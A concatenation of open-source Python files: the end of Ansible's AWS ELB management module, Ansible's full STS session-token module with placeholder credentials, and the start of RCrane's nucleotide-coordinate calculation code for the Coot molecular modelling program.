if zones_to_enable:
self._enable_zones(zones_to_enable)
# N.B. This must come second, in case it would have removed all zones
if zones_to_disable:
self._disable_zones(zones_to_disable)
def _set_security_groups(self):
if self.security_group_ids is not None and set(self.elb.security_groups) != set(self.security_group_ids):
self.elb_conn.apply_security_groups_to_lb(self.name, self.security_group_ids)
self.changed = True
def _set_health_check(self):
"""Set health check values on ELB as needed"""
if self.health_check:
# This just makes it easier to compare each of the attributes
# and look for changes. Keys are attributes of the current
# health_check; values are desired values of new health_check
health_check_config = {
"target": self._get_health_check_target(),
"timeout": self.health_check['response_timeout'],
"interval": self.health_check['interval'],
"unhealthy_threshold": self.health_check['unhealthy_threshold'],
"healthy_threshold": self.health_check['healthy_threshold'],
}
update_health_check = False
# The health_check attribute is *not* set on newly created
# ELBs! So we have to create our own.
if not self.elb.health_check:
self.elb.health_check = HealthCheck()
for attr, desired_value in health_check_config.items():
if getattr(self.elb.health_check, attr) != desired_value:
setattr(self.elb.health_check, attr, desired_value)
update_health_check = True
if update_health_check:
self.elb.configure_health_check(self.elb.health_check)
self.changed = True
def _check_attribute_support(self, attr):
return hasattr(boto.ec2.elb.attributes.LbAttributes(), attr)
def _set_cross_az_load_balancing(self):
attributes = self.elb.get_attributes()
if self.cross_az_load_balancing:
if not attributes.cross_zone_load_balancing.enabled:
self.changed = True
attributes.cross_zone_load_balancing.enabled = True
else:
if attributes.cross_zone_load_balancing.enabled:
self.changed = True
attributes.cross_zone_load_balancing.enabled = False
self.elb_conn.modify_lb_attribute(self.name, 'CrossZoneLoadBalancing',
attributes.cross_zone_load_balancing.enabled)
def _set_access_log(self):
attributes = self.elb.get_attributes()
if self.access_logs:
if 's3_location' not in self.access_logs:
self.module.fail_json(msg='s3_location information required')
access_logs_config = {
"enabled": True,
"s3_bucket_name": self.access_logs['s3_location'],
"s3_bucket_prefix": self.access_logs.get('s3_prefix', ''),
"emit_interval": self.access_logs.get('interval', 60),
}
update_access_logs_config = False
for attr, desired_value in access_logs_config.items():
if getattr(attributes.access_log, attr) != desired_value:
setattr(attributes.access_log, attr, desired_value)
update_access_logs_config = True
if update_access_logs_config:
self.elb_conn.modify_lb_attribute(self.name, 'AccessLog', attributes.access_log)
self.changed = True
elif attributes.access_log.enabled:
attributes.access_log.enabled = False
self.changed = True
self.elb_conn.modify_lb_attribute(self.name, 'AccessLog', attributes.access_log)
def _set_connection_draining_timeout(self):
attributes = self.elb.get_attributes()
if self.connection_draining_timeout is not None:
if not attributes.connection_draining.enabled or \
attributes.connection_draining.timeout != self.connection_draining_timeout:
self.changed = True
attributes.connection_draining.enabled = True
attributes.connection_draining.timeout = self.connection_draining_timeout
self.elb_conn.modify_lb_attribute(self.name, 'ConnectionDraining', attributes.connection_draining)
else:
if attributes.connection_draining.enabled:
self.changed = True
attributes.connection_draining.enabled = False
self.elb_conn.modify_lb_attribute(self.name, 'ConnectionDraining', attributes.connection_draining)
def _set_idle_timeout(self):
attributes = self.elb.get_attributes()
if self.idle_timeout is not None:
if attributes.connecting_settings.idle_timeout != self.idle_timeout:
self.changed = True
attributes.connecting_settings.idle_timeout = self.idle_timeout
self.elb_conn.modify_lb_attribute(self.name, 'ConnectingSettings', attributes.connecting_settings)
def _policy_name(self, policy_type):
return __file__.split('/')[-1].split('.')[0].replace('_', '-') + '-' + policy_type
def _create_policy(self, policy_param, policy_meth, policy):
getattr(self.elb_conn, policy_meth )(policy_param, self.elb.name, policy)
def _delete_policy(self, elb_name, policy):
self.elb_conn.delete_lb_policy(elb_name, policy)
def _update_policy(self, policy_param, policy_meth, policy_attr, policy):
self._delete_policy(self.elb.name, policy)
self._create_policy(policy_param, policy_meth, policy)
def _set_listener_policy(self, listeners_dict, policy=[]):
for listener_port in listeners_dict:
if listeners_dict[listener_port].startswith('HTTP'):
self.elb_conn.set_lb_policies_of_listener(self.elb.name, listener_port, policy)
def _set_stickiness_policy(self, elb_info, listeners_dict, policy, **policy_attrs):
for p in getattr(elb_info.policies, policy_attrs['attr']):
if str(p.__dict__['policy_name']) == str(policy[0]):
if str(p.__dict__[policy_attrs['dict_key']]) != str(policy_attrs['param_value'] or 0):
self._set_listener_policy(listeners_dict)
self._update_policy(policy_attrs['param_value'], policy_attrs['method'], policy_attrs['attr'], policy[0])
self.changed = True
break
else:
self._create_policy(policy_attrs['param_value'], policy_attrs['method'], policy[0])
self.changed = True
self._set_listener_policy(listeners_dict, policy)
def select_stickiness_policy(self):
if self.stickiness:
if 'cookie' in self.stickiness and 'expiration' in self.stickiness:
self.module.fail_json(msg='\'cookie\' and \'expiration\' can not be set at the same time')
elb_info = self.elb_conn.get_all_load_balancers(self.elb.name)[0]
d = {}
for listener in elb_info.listeners:
d[listener[0]] = listener[2]
listeners_dict = d
if self.stickiness['type'] == 'loadbalancer':
policy = []
policy_type = 'LBCookieStickinessPolicyType'
if self.module.boolean(self.stickiness['enabled']):
if 'expiration' not in self.stickiness:
self.module.fail_json(msg='expiration must be set when type is loadbalancer')
expiration = self.stickiness['expiration'] if self.stickiness['expiration'] is not 0 else None
policy_attrs = {
'type': policy_type,
'attr': 'lb_cookie_stickiness_policies',
'method': 'create_lb_cookie_stickiness_policy',
'dict_key': 'cookie_expiration_period',
'param_value': expiration
}
policy.append(self._policy_name(policy_attrs['type']))
self._set_stickiness_policy(elb_info, listeners_dict, policy, **policy_attrs)
elif not self.module.boolean(self.stickiness['enabled']):
if len(elb_info.policies.lb_cookie_stickiness_policies):
if elb_info.policies.lb_cookie_stickiness_policies[0].policy_name == self._policy_name(policy_type):
self.changed = True
else:
self.changed = False
self._set_listener_policy(listeners_dict)
self._delete_policy(self.elb.name, self._policy_name(policy_type))
elif self.stickiness['type'] == 'application':
policy = []
policy_type = 'AppCookieStickinessPolicyType'
if self.module.boolean(self.stickiness['enabled']):
if 'cookie' not in self.stickiness:
self.module.fail_json(msg='cookie must be set when type is application')
policy_attrs = {
'type': policy_type,
'attr': 'app_cookie_stickiness_policies',
'method': 'create_app_cookie_stickiness_policy',
'dict_key': 'cookie_name',
'param_value': self.stickiness['cookie']
}
policy.append(self._policy_name(policy_attrs['type']))
self._set_stickiness_policy(elb_info, listeners_dict, policy, **policy_attrs)
elif not self.module.boolean(self.stickiness['enabled']):
if len(elb_info.policies.app_cookie_stickiness_policies):
if elb_info.policies.app_cookie_stickiness_policies[0].policy_name == self._policy_name(policy_type):
self.changed = True
self._set_listener_policy(listeners_dict)
self._delete_policy(self.elb.name, self._policy_name(policy_type))
else:
self._set_listener_policy(listeners_dict)
def _get_backend_policies(self):
"""Get a list of backend policies"""
policies = []
if self.elb.backends is not None:
for backend in self.elb.backends:
if backend.policies is not None:
for policy in backend.policies:
policies.append(str(backend.instance_port) + ':' + policy.policy_name)
return policies
def _set_backend_policies(self):
"""Sets policies for all backends"""
ensure_proxy_protocol = False
replace = []
backend_policies = self._get_backend_policies()
# Find out what needs to be changed
for listener in self.listeners:
want = False
if 'proxy_protocol' in listener and listener['proxy_protocol']:
ensure_proxy_protocol = True
want = True
if str(listener['instance_port']) + ':ProxyProtocol-policy' in backend_policies:
if not want:
replace.append({'port': listener['instance_port'], 'policies': []})
elif want:
replace.append({'port': listener['instance_port'], 'policies': ['ProxyProtocol-policy']})
# enable or disable proxy protocol
if ensure_proxy_protocol:
self._set_proxy_protocol_policy()
# Make the backend policies so
for item in replace:
self.elb_conn.set_lb_policies_of_backend_server(self.elb.name, item['port'], item['policies'])
self.changed = True
def _get_proxy_protocol_policy(self):
"""Find out if the elb has a proxy protocol enabled"""
if self.elb.policies is not None and self.elb.policies.other_policies is not None:
for policy in self.elb.policies.other_policies:
if policy.policy_name == 'ProxyProtocol-policy':
return policy.policy_name
return None
def _set_proxy_protocol_policy(self):
"""Install a proxy protocol policy if needed"""
proxy_policy = self._get_proxy_protocol_policy()
if proxy_policy is None:
self.elb_conn.create_lb_policy(
self.elb.name, 'ProxyProtocol-policy', 'ProxyProtocolPolicyType', {'ProxyProtocol': True}
)
self.changed = True
# TODO: remove proxy protocol policy if not needed anymore? There is no side effect to leaving it there
def _diff_list(self, a, b):
"""Find the entries in list a that are not in list b"""
b = set(b)
return [aa for aa in a if aa not in b]
def _get_instance_ids(self):
"""Get the current list of instance ids installed in the elb"""
instances = []
if self.elb.instances is not None:
for instance in self.elb.instances:
instances.append(instance.id)
return instances
def _set_instance_ids(self):
"""Register or deregister instances from an lb instance"""
assert_instances = self.instance_ids or []
has_instances = self._get_instance_ids()
add_instances = self._diff_list(assert_instances, has_instances)
if add_instances:
self.elb_conn.register_instances(self.elb.name, add_instances)
self.changed = True
if self.purge_instance_ids:
remove_instances = self._diff_list(has_instances, assert_instances)
if remove_instances:
self.elb_conn.deregister_instances(self.elb.name, remove_instances)
self.changed = True
def _set_tags(self):
"""Add/Delete tags"""
if self.tags is None:
return
params = {'LoadBalancerNames.member.1': self.name}
tagdict = dict()
# get the current list of tags from the ELB, if ELB exists
if self.elb:
current_tags = self.elb_conn.get_list('DescribeTags', params,
[('member', Tag)])
tagdict = dict((tag.Key, tag.Value) for tag in current_tags
if hasattr(tag, 'Key'))
# Add missing tags
dictact = dict(set(self.tags.items()) - set(tagdict.items()))
if dictact:
for i, key in enumerate(dictact):
params['Tags.member.%d.Key' % (i + 1)] = key
params['Tags.member.%d.Value' % (i + 1)] = dictact[key]
self.elb_conn.make_request('AddTags', params)
self.changed=True
# Remove extra tags
dictact = dict(set(tagdict.items()) - set(self.tags.items()))
if dictact:
for i, key in enumerate(dictact):
params['Tags.member.%d.Key' % (i + 1)] = key
self.elb_conn.make_request('RemoveTags', params)
self.changed=True
def _get_health_check_target(self):
"""Compose target string from healthcheck parameters"""
protocol = self.health_check['ping_protocol'].upper()
path = ""
if protocol in ['HTTP', 'HTTPS'] and 'ping_path' in self.health_check:
path = self.health_check['ping_path']
return "%s:%s%s" % (protocol, self.health_check['ping_port'], path)
def main():
argument_spec = ec2_argument_spec()
argument_spec.update(dict(
state={'required': True, 'choices': ['present', 'absent']},
name={'required': True},
listeners={'default': None, 'required': False, 'type': 'list'},
purge_listeners={'default': True, 'required': False, 'type': 'bool'},
instance_ids={'default': None, 'required': False, 'type': 'list'},
purge_instance_ids={'default': False, 'required': False, 'type': 'bool'},
zones={'default': None, 'required': False, 'type': 'list'},
purge_zones={'default': False, 'required': False, 'type': 'bool'},
security_group_ids={'default': None, 'required': False, 'type': 'list'},
security_group_names={'default': None, 'required': False, 'type': 'list'},
health_check={'default': None, 'required': False, 'type': 'dict'},
subnets={'default': None, 'required': False, 'type': 'list'},
purge_subnets={'default': False, 'required': False, 'type': 'bool'},
scheme={'default': 'internet-facing', 'required': False},
connection_draining_timeout={'default': None, 'required': False, 'type': 'int'},
idle_timeout={'default': None, 'type': 'int', 'required': False},
cross_az_load_balancing={'default': None, 'type': 'bool', 'required': False},
stickiness={'default': None, 'required': False, 'type': 'dict'},
access_logs={'default': None, 'required': False, 'type': 'dict'},
wait={'default': False, 'type': 'bool', 'required': False},
wait_timeout={'default': 60, 'type': 'int', 'required': False},
tags={'default': None, 'required': False, 'type': 'dict'}
)
)
module = AnsibleModule(
argument_spec=argument_spec,
mutually_exclusive = [['security_group_ids', 'security_group_names']]
)
if not HAS_BOTO:
module.fail_json(msg='boto required for this module')
region, ec2_url, aws_connect_params = get_aws_connection_info(module)
if not region:
module.fail_json(msg="Region must be specified as a parameter, in EC2_REGION or AWS_REGION environment variables or in boto configuration file")
name = module.params['name']
state = module.params['state']
listeners = module.params['listeners']
purge_listeners = module.params['purge_listeners']
instance_ids = module.params['instance_ids']
purge_instance_ids = module.params['purge_instance_ids']
zones = module.params['zones']
purge_zones = module.params['purge_zones']
security_group_ids = module.params['security_group_ids']
security_group_names = module.params['security_group_names']
health_check = module.params['health_check']
access_logs = module.params['access_logs']
subnets = module.params['subnets']
purge_subnets = module.params['purge_subnets']
scheme = module.params['scheme']
connection_draining_timeout = module.params['connection_draining_timeout']
idle_timeout = module.params['idle_timeout']
cross_az_load_balancing = module.params['cross_az_load_balancing']
stickiness = module.params['stickiness']
wait = module.params['wait']
wait_timeout = module.params['wait_timeout']
tags = module.params['tags']
if state == 'present' and not listeners:
module.fail_json(msg="At least one listener is required for ELB creation")
if state == 'present' and not (zones or subnets):
module.fail_json(msg="At least one availability zone or subnet is required for ELB creation")
if wait_timeout > 600:
module.fail_json(msg='wait_timeout maximum is 600 seconds')
if security_group_names:
security_group_ids = []
try:
ec2 = connect_to_aws(boto.ec2, region, **aws_connect_params)
if subnets: # We have at least one subnet, ergo this is a VPC
vpc_conn = _get_vpc_connection(module=module, region=region, aws_connect_params=aws_connect_params)
vpc_id = vpc_conn.get_all_subnets([subnets[0]])[0].vpc_id
filters = {'vpc_id': vpc_id}
else:
filters = None
grp_details = ec2.get_all_security_groups(filters=filters)
for group_name in security_group_names:
if isinstance(group_name, basestring):
group_name = [group_name]
group_id = [ str(grp.id) for grp in grp_details if str(grp.name) in group_name ]
security_group_ids.extend(group_id)
except boto.exception.NoAuthHandlerFound as e:
module.fail_json(msg = str(e))
elb_man = ElbManager(module, name, listeners, purge_listeners, zones,
purge_zones, security_group_ids, health_check,
subnets, purge_subnets, scheme,
connection_draining_timeout, idle_timeout,
cross_az_load_balancing,
access_logs, stickiness, wait, wait_timeout, tags,
region=region, instance_ids=instance_ids, purge_instance_ids=purge_instance_ids,
**aws_connect_params)
# check for unsupported attributes for this version of boto
if cross_az_load_balancing and not elb_man._check_attribute_support('cross_zone_load_balancing'):
module.fail_json(msg="You must install boto >= 2.18.0 to use the cross_az_load_balancing attribute")
if connection_draining_timeout and not elb_man._check_attribute_support('connection_draining'):
module.fail_json(msg="You must install boto >= 2.28.0 to use the connection_draining_timeout attribute")
if idle_timeout and not elb_man._check_attribute_support('connecting_settings'):
module.fail_json(msg="You must install boto >= 2.33.0 to use the idle_timeout attribute")
if state == 'present':
elb_man.ensure_ok()
elif state == 'absent':
elb_man.ensure_gone()
ansible_facts = {'ec2_elb': 'info'}
ec2_facts_result = dict(changed=elb_man.changed,
elb=elb_man.get_info(),
ansible_facts=ansible_facts)
module.exit_json(**ec2_facts_result)
if __name__ == '__main__':
main()
|
dav1x/ansible
|
lib/ansible/modules/cloud/amazon/ec2_elb_lb.py
|
Python
|
gpl-3.0
| 53,260
|
#!/usr/bin/python
# Copyright: Ansible Project
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['stableinterface'],
'supported_by': 'certified'}
DOCUMENTATION = '''
---
module: sts_session_token
short_description: Obtain a session token from the AWS Security Token Service
description:
- Obtain a session token from the AWS Security Token Service
version_added: "2.2"
author: Victor Costan (@pwnall)
options:
duration_seconds:
description:
- The duration, in seconds, of the session token.
See http://docs.aws.amazon.com/STS/latest/APIReference/API_GetSessionToken.html#API_GetSessionToken_RequestParameters
for acceptable and default values.
required: false
default: null
mfa_serial_number:
description:
- The identification number of the MFA device that is associated with the user who is making the GetSessionToken call.
required: false
default: null
mfa_token:
description:
- The value provided by the MFA device, if the trust policy of the user requires MFA.
required: false
default: null
notes:
- In order to use the session token in a following playbook task you must pass the I(access_key), I(access_secret) and I(access_token).
extends_documentation_fragment:
- aws
- ec2
requirements:
- boto3
- botocore
- python >= 2.6
'''
RETURN = """
sts_creds:
description: The Credentials object returned by the AWS Security Token Service
returned: always
type: list
sample:
access_key: ASXXXXXXXXXXXXXXXXXX
expiration: "2016-04-08T11:59:47+00:00"
secret_key: XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
session_token: XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
changed:
description: True if obtaining the credentials succeeds
type: bool
returned: always
"""
EXAMPLES = '''
# Note: These examples do not set authentication details, see the AWS Guide for details.
# Get a session token (more details: http://docs.aws.amazon.com/STS/latest/APIReference/API_GetSessionToken.html)
sts_session_token:
duration: 3600
register: session_credentials
# Use the session token obtained above to tag an instance in account 123456789012
ec2_tag:
aws_access_key: "{{ session_credentials.sts_creds.access_key }}"
aws_secret_key: "{{ session_credentials.sts_creds.secret_key }}"
security_token: "{{ session_credentials.sts_creds.session_token }}"
resource: i-xyzxyz01
state: present
tags:
MyNewTag: value
'''
try:
import boto3
from botocore.exceptions import ClientError
HAS_BOTO3 = True
except ImportError:
HAS_BOTO3 = False
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils.ec2 import boto3_conn, ec2_argument_spec, get_aws_connection_info
def normalize_credentials(credentials):
access_key = credentials.get('AccessKeyId', None)
secret_key = credentials.get('SecretAccessKey', None)
session_token = credentials.get('SessionToken', None)
expiration = credentials.get('Expiration', None)
return {
'access_key': access_key,
'secret_key': secret_key,
'session_token': session_token,
'expiration': expiration
}
def get_session_token(connection, module):
duration_seconds = module.params.get('duration_seconds')
mfa_serial_number = module.params.get('mfa_serial_number')
mfa_token = module.params.get('mfa_token')
changed = False
args = {}
if duration_seconds is not None:
args['DurationSeconds'] = duration_seconds
if mfa_serial_number is not None:
args['SerialNumber'] = mfa_serial_number
if mfa_token is not None:
args['TokenCode'] = mfa_token
try:
response = connection.get_session_token(**args)
changed = True
except ClientError as e:
module.fail_json(msg=e)
credentials = normalize_credentials(response.get('Credentials', {}))
module.exit_json(changed=changed, sts_creds=credentials)
def main():
argument_spec = ec2_argument_spec()
argument_spec.update(
dict(
duration_seconds = dict(required=False, default=None, type='int'),
mfa_serial_number = dict(required=False, default=None),
mfa_token = dict(required=False, default=None)
)
)
module = AnsibleModule(argument_spec=argument_spec)
if not HAS_BOTO3:
module.fail_json(msg='boto3 and botocore are required.')
region, ec2_url, aws_connect_kwargs = get_aws_connection_info(module, boto3=True)
if region:
connection = boto3_conn(module, conn_type='client', resource='sts', region=region, endpoint=ec2_url, **aws_connect_kwargs)
else:
module.fail_json(msg="region must be specified")
get_session_token(connection, module)
if __name__ == '__main__':
main()
|
nrwahl2/ansible
|
lib/ansible/modules/cloud/amazon/sts_session_token.py
|
Python
|
gpl-3.0
| 5,043
|
#!/usr/bin/env python
"""Functions for calculating nucleotide coordinates"""
# Copyright 2010, 2011, 2012 Kevin Keating
#
# Licensed under the Educational Community License, Version 2.0 (the
# "License"); you may not use this file except in compliance with the
# License. You may obtain a copy of the License at
#
# http://www.osedu.org/licenses/ECL-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an "AS IS"
# BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express
# or implied. See the License for the specific language governing
# permissions and limitations under the License.
import os.path
import re
import gtk
from copy import deepcopy
#from time import sleep #for debugging
#from pprint import pprint #for debugging
from coot import refinement_immediate_replacement_state, set_refinement_immediate_replacement, accept_regularizement, clear_all_fixed_atoms, add_extra_torsion_restraint, set_refine_with_torsion_restraints, refine_with_torsion_restraints_state, matrix_state, set_matrix, delete_all_extra_restraints, add_extra_start_pos_restraint, refine_zone, set_use_only_extra_torsion_restraints_for_torsions
from coot import svn_revision #needed to see if Coot is new enough for Phenix restraints
from coot import monomer_restraints_py as monomer_restraints
from coot import set_monomer_restraints_py as set_monomer_restraints
from coot import refine_residues_py as refine_residues
from coot import refine_zone_with_score_py as refine_zone_with_score
from coot import mark_multiple_atoms_as_fixed_py as mark_multiple_atoms_as_fixed
#regularize_zone_with_score_py only exists in Coot newer than 3728 (0.7-pre)
#so we won't be able to find it in Coot 0.6.2
#this function is only used in Rotamerize without density, and the menu option for that won't be created
#unless Coot is newer than 3728
#so we can safely ignore the ImportError
try:
from coot import regularize_zone_with_score_py as regularize_zone_with_score
except ImportError:
pass
#use_only_extra_torsion_restraints_for_torsions_state() only exists in Coot newer than ~3902
#if the function doesn't exist, then just assume that this variable was turned off
#(since RCrane is probably the only thing that uses it)
try:
from coot import use_only_extra_torsion_restraints_for_torsions_state
except ImportError:
def use_only_extra_torsion_restraints_for_torsions_state(): return 0
from buildInitSugar import BuildInitSugar, rotateSugar
from puckerList import puckerList
from buildPhosOxy import buildPhosOxy, buildInitOrTerminalPhosOxy
from rotData import RotDataLoader
from puckerList import puckerList
from guiUtils import HBOX_SPACING, VBOX_SPACING, createRCraneWindowObject
import phenixRestraints
#initialize a BuildInitSugar object when this module is loaded
rcranePath = os.path.dirname(os.path.abspath(__file__))
dataPath = os.path.join(rcranePath, "data")
sugarBuilder = BuildInitSugar(c3pStruc = os.path.join(dataPath, "c3p.pdb"),
c2pStruc = os.path.join(dataPath, "c2p.pdb"))
#initialize a rotData object when this module is loaded
rotData = RotDataLoader(os.path.join(dataPath, "dihedData.csv"))
TORSION_STD_DEV_MOD = 0.1 #for minimization restraints, all the standard deviations for all rotamer torsions are multiplied by this number
MANUAL_TORSION_STD_DEV = 2 #when rotamerizing an already existing structure, this will be used as the standard deviation for the
#non-predicted torsions (i.e. the first and last half-nucleotides)
#the standard deviations for the harmonic (start position) restraints
#the larger the number, the more freedom the restrained atoms have to move
HARMONIC_STD_DEV_PHOSPHATE = 0.25 #for phosphates
HARMONIC_STD_DEV_BASE = 0.1 #for base atoms
#sugar torsions for C3' and C2' sugars (taken from Phenix (phenix/1.6.2-432/phenix-1.6.2-432/chem_data/geostd/rna_dna/mod_rna2p.cif and mod_rna3p.cif))
NU0_C3 = 3.0
NU1_C3 = 335.0
NU4_C3 = 145.0 #Coot refers to C5'-C4'-O4'-C1' as nu4. I think nu4 is actually C3'-C4'-O4'-C1'.
#We're using the C5' version of the torsion here
NU0_C2 = 339.0
NU1_C2 = 35.0
NU4_C2 = 123.0
#TODO: use realnu4 and wasnu4? that's what Phenix uses
#torsions for chi (also taken from Phenix)
CHI_MEAN = -123.0
CHI_STD_DEV = 24.3
NU_STD_DEV = 4 #Coot default is 40, but we want to make sure that the sugars don't get flattened
#TODO: try a value of 8 here? that's what Phenix uses
REFINE_MAP_WEIGHT = 10 #the weight of the map term during the minimization (Coot default is 60)
#if this value it too high, Coot will distort the sugar to try to fit the O2' into density
#TODO: try to balance this value against NU_STD_DEV
SYN_REBUILDING_CUTOFF = 3 #any minimization scores above this will cause the minimiztion to be restarted using a syn sugar
HIGH_ANTI_REBUILDING_CUTOFF = 8 #if both the anti and the syn minimizations are above this score, then the minimization
#will be restarted using a high-anti sugar
REFINEMENT_FAIL_SCORE = 99999 #what score to assign a minimization that didn't return a score (which means that the refinement failed)
PRINT_SUMMARY_TABLE = False #whether to print a summary table of minimization scores
#note that setting rcrane_debug to True before launching RCrane will set PRINT_SUMMARY_TABLE to True
#(launch.py will set PRINT_SUMMARY_TABLE after loading this module)
#atoms to not fix during minimization
PREV_RES_MOBILE_ATOMS = frozenset(["O3'"]) #OP1 and OP2 may be added at runtime
CUR_RES_MOBILE_ATOMS = frozenset("P C2' O2' C3' O3' C4' O4' C5' O5'".split(" ")) #C1' should be the only restrained backbone atom
NEXT_RES_MOBILE_ATOMS = frozenset("P O5' OP1 OP2".split(" ")) #The O5' will only be present if the next residue is already built
#default to using the Coot/CCP4 restraints, as opposed to Phenix's pucker-specific restraints
#This default may change in the future
USE_PHENIX_RESTRAINTS = False
PHENIX_NEW_RESTRAINT_ATOMS = frozenset("N1 N9 C1' C2' O2' C3' O3' C4' O4' C5' O5' P OP1 OP2".split(" "))
#bond and angle restraints where all atoms are on this list will be rewritten if USE_PHENIX_RESTRAINTS is True
def calcCoords(builtChain, bestPath, pseudoMol, window):
"""Calculate coordinates for a chain of nucleotides
ARGUMENTS:
builtChain - a chain object containing phosphate and base coordinates for all nucleotides to be built
bestPath - a list of the desired conformers to be built
pseudoMol - a pseudoMolecule object currently being used to display the chain
window - the window contianing the GUI
RETURNS:
intermediateAtomLocs - phosphate and O3' coordinates for each nucleotide immediately before minimization of that nucleotide was started
minimizationScores - a list of the minimization scores for each nucleotide
NOTE:
If only a single nucleotide is being built, then we don't have a full suite, so there are no confmers
In this case, bestPath should be a scalar containing the intended pucker of the nucleotide to be built
"""
#put a progress bar in window
progressDialog = ProgressDialogObject(window, builtChain.numNucs()-1)
#we're going to have to change some Coot settings during the coordinate calculation
#so check what the existing values are so we can set them back
origCootSettings = __changeCootSettings()
intermediateAtomLocs = None
minimizationScores = None
#enclose the rest of the function in a try clause so that we can still reset the Coot variables even if something goes wrong
try:
#for x in (1,):
if builtChain.numNucs() == 1:
#if there's only one nucleotide, then there's nothing we can do (the nucleotide should contain only a phosphate)
return
elif builtChain.numNucs() == 2:
#if there are two nucleotides, then we have a single sugar with both a 5' and a 3' phosphate
#we can't determine a conformer, but we can predict the sugar pucker and minimize things without any torsions
__minCoords(pseudoMol, #pseudoMolecule object
None, None, 1, 2, #residue numbers
None, None, #rotamers
None, builtChain.nucleotides[0].type, None, #residue types
builtChain.nucleotides[0].atoms, #atomic coordinates
pucker = bestPath, nextResAtoms = builtChain.nucleotides[1].atoms)
else:
#if we recalculate coordinates later, we want to mimic the conditions of this minimization as closely as possible
#this means we need to store intermediate locations for the phophate and O3'
#(i.e. for phosphate i, we need to store it's location after minimizing nucleotide i-1 but before minimizing nucleotide i)
#the first phosphate doesn't have an intermediate location, so just store None for that nucleotide
intermediateAtomLocs = [None]
minimizationScores = []
#build the first nucleotide (don't put torsional constraints on the initial alpha, beta, and gamma)
#minimize the structure
(newCoords, score) = __minCoords(pseudoMol, #pseudoMolecule object
None, None, 1, 2, #residue numbers
None, bestPath[0], #rotamers
None, builtChain.nucs[0].type, builtChain.nucs[1].type, #residue types
builtChain.nucs[0].atoms) #atomic coordinates
#update the builtChain object with the new coordinates
(builtChain.nucs[0].atoms, builtChain.nucs[1].atoms) = newCoords
#store the phosphate and previous O3' location
intermediateAtomLocs.append([builtChain.nucs[1].atoms["P"], builtChain.nucs[0].atoms["O3'"], builtChain.nucs[0].atoms["C3'"]])
minimizationScores.append(score)
#increment the progress bar
progressDialog.progress()
#return
fixPrevPhosOxy = True #don't minimize the first previous phosphoryl oxygens since it's going to take a long time and isn't
#going to make them any more accurate since there's no O3' to use to position them
#built the middle nucleotides
for resNum in xrange(1, len(bestPath)):
#minimize the structure
(newCoords, score) = __minCoords(pseudoMol, #pseudoMolecule object
resNum-1 or None, resNum, resNum+1, resNum+2, #residue numbers
bestPath[resNum-1], bestPath[resNum], #rotamers
builtChain.nucs[resNum-1].type, builtChain.nucs[resNum].type, builtChain.nucs[resNum+1].type, #residue types
builtChain.nucs[resNum].atoms, #atomic coordinates
fixPrevPhosOxy = fixPrevPhosOxy)
#update the builtChain object with the new coordinates
(builtChain.nucs[resNum-1].atoms, builtChain.nucs[resNum].atoms, builtChain.nucs[resNum+1].atoms) = newCoords
#store the phosphate location
intermediateAtomLocs.append([builtChain.nucs[resNum+1].atoms["P"], builtChain.nucs[resNum].atoms["O3'"], builtChain.nucs[resNum].atoms["C3'"]])
minimizationScores.append(score)
progressDialog.progress() #increment the progress bar
fixPrevPhosOxy = False #minimize all of the non-bridging oxygens from here on
#build the last nucleotide (don't put torsional constraints on the final epsilon and zeta)
resNum = len(bestPath)
#minimize the structure
(newCoords, score) = __minCoords(pseudoMol, #pseudoMolecule object
resNum-1 or None, resNum, resNum+1, resNum+2, #residue numbers
bestPath[resNum-1], None, #rotamers
builtChain.nucs[resNum-1].type, builtChain.nucs[resNum].type, None, #residue types
builtChain.nucs[resNum].atoms, #atomic coordinates
fixPrevPhosOxy = fixPrevPhosOxy)
#update the builtChain object with the new coordinates
(builtChain.nucs[resNum-1].atoms, builtChain.nucs[resNum].atoms, builtChain.nucs[resNum+1].atoms) = newCoords
minimizationScores.append(score)
#increment the progress bar before we do the last thing so that the user sees it at 100% for a few seconds
progressDialog.progress()
#We no longer minimize the terminal phosphoryl oxygens, since it occasionally takes a long time and doesn't seem
#to improve their placement much.
finally:
#restore the original Coot settings even if something went wrong during the minimization
__restoreCootSettings(origCootSettings)
#only draw extra bonds if the user is going to be presented with a GUI
#otherwise, there won't be any way to delete the extra bonds
if builtChain.numNucs() > 2:
pseudoMol.drawExtraBonds()
return (intermediateAtomLocs, minimizationScores)
def recalcCoords(startingRes, endingRes, rots, origCoords, pseudoMol, window, ignoreDensity = False):
"""Recalculate coordinates (using different rotamers) for part of a chain of nucleotides starting with a chain built by calcCoords
ARGUMENTS:
startingRes - the first residue to rebuild
endingRes - the last residue to rebuilt
rots - what rotamers to use for the rebuild
origCoords - a chain object containing the current coordinates
pseudoMol - a pseudoMolecule object currently being used to display the chain
window - the window contianing the GUI
OPTIONAL ARGUMENTS:
ignoreDensity - ignore the density when performing the minimization
defaults to False
RETURNS:
intermediateAtomLocs - phosphate and O3' coordinates for each nucleotide immediately before minimization of that nucleotide was started
minimizationScores - a list of the minimization scores for each nucleotide
NOTE:
Currently, the return values from this function are only used for initial rotamerize minimization. They are ignored for all
other calls to this function
"""
#convert the starting and ending residues to indices
startingResIndex = origCoords.resIndex(startingRes)
endingResIndex = origCoords.resIndex(endingRes)
#print "Indices:", startingResIndex, ",", endingResIndex
progressDialog = ProgressDialogObject(window, endingResIndex - startingResIndex + 1)
while gtk.events_pending(): gtk.main_iteration(False)
#at least on Windows, the progressDialog isn't showing until after the atoms are frozen without this line
#we're going to have to change some Coot settings during the coordinate calculation
#so check what the existing values are so we can set them back
origCootSettings = __changeCootSettings()
builtChain = deepcopy(origCoords) #we don't want to modify this object
print "Recalculating ", startingRes, "-", endingRes
#from time import sleep; sleep(3)
#initialize intermediateAtomLocs (the first nucleotide doesn't have an intermediate location)
intermediateAtomLocs = [None]
minimizationScores = []
try:
if startingResIndex == 0:
#if we're at the first nucleotide of the chain (or we're right after a chain break)
print "Rebuilding initial nucleotide"
#if we have to build the first nucleotide of the chain
#minimize the structure
(newCoords, score) = __minCoords(pseudoMol, #pseudoMolecule object
